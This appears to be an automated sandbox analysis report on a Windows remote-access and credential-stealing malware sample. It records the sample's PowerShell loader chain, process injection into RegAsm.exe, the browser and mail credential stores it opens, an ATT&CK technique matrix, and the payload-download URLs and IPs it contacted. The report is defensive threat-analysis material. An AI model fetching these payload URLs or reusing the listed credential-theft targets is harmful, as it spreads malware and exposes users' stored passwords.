                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A68964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF7D2A68964
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041B69E GetComputerNameExW,GetUserNameW,33_2_0041B69E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,33_2_00449210
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A62C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7D2A62C54
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r\MsMpeng.exe
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ows Defender\MsMpeng.exe
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data33_2_0040BA4D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\33_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db33_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword38_2_004033F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword38_2_00402DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword38_2_00402DB3
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2552, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UP4CTA
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe33_2_0040569A
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information112
                      Scripting
                      Valid Accounts21
                      Windows Management Instrumentation
                      112
                      Scripting
                      1
                      DLL Side-Loading
                      11
                      Deobfuscate/Decode Files or Information
                      2
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services12
                      Archive Collected Data
                      22
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts121
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Bypass User Account Control
                      2
                      Obfuscated Files or Information
                      211
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      21
                      Encrypted Channel
                      Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts1
                      Exploitation for Client Execution
                      1
                      Windows Service
                      1
                      Access Token Manipulation
                      11
                      Software Packing
                      2
                      Credentials in Registry
                      1
                      System Service Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts32
                      Command and Scripting Interpreter
                      21
                      Registry Run Keys / Startup Folder
                      1
                      Windows Service
                      1
                      Timestomp
                      3
                      Credentials In Files
                      4
                      File and Directory Discovery
                      Distributed Component Object Model211
                      Input Capture
                      1
                      Remote Access Software
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts2
                      Service Execution
                      Network Logon Script422
                      Process Injection
                      1
                      DLL Side-Loading
                      LSA Secrets39
                      System Information Discovery
                      SSH3
                      Clipboard Data
                      3
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable Media2
                      PowerShell
                      RC Scripts21
                      Registry Run Keys / Startup Folder
                      1
                      Bypass User Account Control
                      Cached Domain Credentials61
                      Security Software Discovery
                      VNCGUI Input Capture124
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion
                      DCSync31
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Masquerading
                      Proc Filesystem5
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Access Token Manipulation
                      Network Sniffing1
                      System Owner/User Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd422
                      Process Injection
                      Input Capture1
                      System Network Configuration Discovery
                      Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530744 Sample: 6706e721f2c06.exe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 91 raw.githubusercontent.com 2->91 93 bitbucket.org 2->93 95 9 other IPs or domains 2->95 107 Suricata IDS alerts for network traffic 2->107 109 Found malware configuration 2->109 111 Malicious sample detected (through community Yara rule) 2->111 113 19 other signatures 2->113 15 6706e721f2c06.exe 1 3 2->15         started        18 wscript.exe 2->18         started        signatures3 process4 file5 87 C:\Users\user\AppData\...\6706e721f2c06.vbs, ASCII 15->87 dropped 20 cmd.exe 3 2 15->20         started        22 InnoCraft.scr 18->22         started        process6 process7 24 wscript.exe 1 20->24         started        27 conhost.exe 20->27         started        29 conhost.exe 20->29         started        signatures8 123 Suspicious powershell command line found 24->123 125 Wscript starts Powershell (via cmd or directly) 24->125 127 Windows Scripting host queries suspicious COM object (likely to drop second stage) 24->127 129 Suspicious execution chain found 24->129 31 powershell.exe 7 24->31         started        process9 signatures10 147 Suspicious powershell command line found 31->147 149 Suspicious execution chain found 31->149 151 Found suspicious powershell code related to unpacking or dynamic code loading 31->151 34 powershell.exe 14 25 31->34         started        38 conhost.exe 31->38         started        process11 dnsIp12 97 raw.githubusercontent.com 185.199.110.133, 443, 49736, 49845 FASTLYUS Netherlands 34->97 99 bitbucket.org 185.166.143.48, 443, 49761 AMAZON-02US Germany 34->99 101 s3-w.us-east-1.amazonaws.com 52.217.171.225, 443, 49770 AMAZON-02US United States 34->101 115 Writes to foreign memory regions 34->115 117 Injects a PE file into a foreign processes 34->117 119 Loading BitLocker PowerShell Module 34->119 40 RegAsm.exe 17 34->40         started        44 RegAsm.exe 34->44         started        signatures13 process14 dnsIp15 103 qwdfewf.com 185.185.71.79, 49789, 80 SPRINTHOSTRU Russian Federation 40->103 105 api.ipify.org 104.26.12.205, 49782, 80 CLOUDFLARENETUS United States 40->105 79 C:\Users\user\AppData\...\PdfReaderEn.EXE, PE32 40->79 dropped 81 C:\Users\user\...\MicrosoftServiceUpdater.exe, PE32+ 40->81 dropped 83 C:\Users\user\AppData\Local\...\legit[1].exe, PE32 40->83 dropped 85 C:\Users\user\AppData\...\payload[1].exe, PE32+ 40->85 dropped 47 MicrosoftServiceUpdater.exe 40->47         started        49 PdfReaderEn.EXE 26 40->49         started        139 Contains functionality to bypass UAC (CMSTPLUA) 44->139 141 Tries to steal Mail credentials (via file registry) 44->141 143 Contains functionalty to change the wallpaper 44->143 145 5 other signatures 44->145 file16 signatures17 process18 file19 52 cmd.exe 47->52         started        75 C:\Users\user\AppData\Local\...\Disposition, COM 49->75 dropped 54 cmd.exe 49->54         started        process20 file21 58 wscript.exe 52->58         started        61 conhost.exe 52->61         started        77 C:\Users\user\AppData\Local\...\Lucas.pif, PE32 54->77 dropped 121 Drops PE files with a suspicious file extension 54->121 63 Lucas.pif 54->63         started        66 conhost.exe 54->66         started        68 tasklist.exe 54->68         started        70 7 other processes 54->70 signatures22 process23 file24 133 Suspicious powershell command line found 58->133 135 Wscript starts Powershell (via cmd or directly) 58->135 72 powershell.exe 58->72         started        89 C:\Users\user\AppData\Local\...\InnoCraft.scr, PE32 63->89 dropped 137 Drops PE files with a suspicious file extension 63->137 signatures25 process26 signatures27 131 Suspicious powershell command line found 72->131

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      6706e721f2c06.exe8%ReversingLabs
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr5%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\603423\Lucas.pif5%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.imvu.comr0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://aka.ms/pscore60%URL Reputationsafe
                      http://go.micros0%URL Reputationsafe
                      http://geoplugin.net/json.gp/C0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://login.yahoo.com/config/login0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      http://www.imvu.com0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                      http://geoplugin.net/json.gp0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://www.ebuddy.com0%URL Reputationsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      s3-w.us-east-1.amazonaws.com
                      52.217.171.225
                      truefalse
                        unknown
                        bitbucket.org
                        185.166.143.48
                        truetrue
                          unknown
                          s-part-0023.t-0009.t-msedge.net
                          13.107.246.51
                          truefalse
                            unknown
                            raw.githubusercontent.com
                            185.199.110.133
                            truetrue
                              unknown
                              geoplugin.net
                              178.237.33.50
                              truefalse
                                unknown
                                api.ipify.org
                                104.26.12.205
                                truefalse
                                  unknown
                                  qwdfewf.com
                                  185.185.71.79
                                  truefalse
                                    unknown
                                    fp2e7a.wpc.phicdn.net
                                    192.229.221.95
                                    truefalse
                                      unknown
                                      bbuseruploads.s3.amazonaws.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        KIVYliOyxsOz.KIVYliOyxsOz
                                        unknown
                                        unknowntrue
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          https://bitbucket.org/fwfsfw/fwf/downloads/FkFjirc.txtfalse
                                            unknown
                                            http://qwdfewf.com/dwn_legit_filefalse
                                              unknown
                                              http://qwdfewf.com/dwn_payload_filefalse
                                                unknown
                                                https://bitbucket.org/fwfsfw/fwf/downloads/knSfcpm.txtfalse
                                                  unknown
                                                  https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723true
                                                    unknown
                                                    http://geoplugin.net/json.gpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    101.99.94.69true
                                                      unknown
                                                      http://qwdfewf.com/reg_auth_machinefalse
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://www.imvu.comrRegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.1736154825.000001F6C3992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://aka.ms/pscore6powershell.exe, 00000005.00000002.2276191750.00000256B22F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.nirsoft.netRegAsm.exe, 00000025.00000002.1698984319.00000000009B3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://api.ipify.org/kRegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://qwdfewf.com/dwn_payload_fileHRegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.autoitscript.com/autoit3/PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drfalse
                                                                  unknown
                                                                  http://go.microspowershell.exe, 00000007.00000002.1453521451.000001F6B83AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://api.ipify.org/F)RegAsm.exe, 00000009.00000002.1533827567.000000000140A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://www.google.comRegAsm.exe, RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://bbuseruploads.s3.amazonaws.com/ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/e4679797-5458-powershell.exe, 00000007.00000002.1453521451.000001F6B78DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://qwdfewf.com/RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://qwdfewf.com/dwn_payload_file/gRegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://geoplugin.net/json.gp/CRegAsm.exe, 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.1453521451.000001F6B3D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://contoso.com/powershell.exe, 00000007.00000002.1736154825.000001F6C3992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1736154825.000001F6C3992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://api.ipify.org/RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001475000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.000000000140A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://aui-cdn.atlassian.com/powershell.exe, 00000007.00000002.1453521451.000001F6B3D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://qwdfewf.com/dwn_payload_fileiRegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://qwdfewf.com/reg_auth_machinenRegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735powershell.exe, 00000005.00000002.2475898661.00000256CA9F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2276191750.00000256B2851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B7D99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1452667448.000001F6B1C92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453022165.000001F6B1E95000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1452667448.000001F6B1CFB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453076972.000001F6B3670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1452667448.000001F6B1C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1680360575.000001D822373000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D823FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1703643923.000001D823DE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1680360575.000001D8223EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1680360575.000001D822360000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1673231192.000001D8222E5000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                          unknown
                                                                                          http://www.nirsoft.net/RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2276191750.00000256B2350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D823FE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://bitbucket.orgpowershell.exe, 00000007.00000002.1453521451.000001F6B78DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D827F9C000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                              unknown
                                                                                              https://login.DRegAsm.exe, 00000025.00000002.1709093600.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.autoitscript.com/autoit3/JPdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000000.1581000790.0000000000759000.00000002.00000001.01000000.0000000D.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, InnoCraft.scr, 0000002B.00000000.1740628764.0000000000DB9000.00000002.00000001.01000000.0000000F.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drfalse
                                                                                                  unknown
                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1736154825.000001F6C3992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000007.00000002.1453521451.000001F6B7A0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B8E99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://qwdfewf.com/dwn_payload_filetRegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
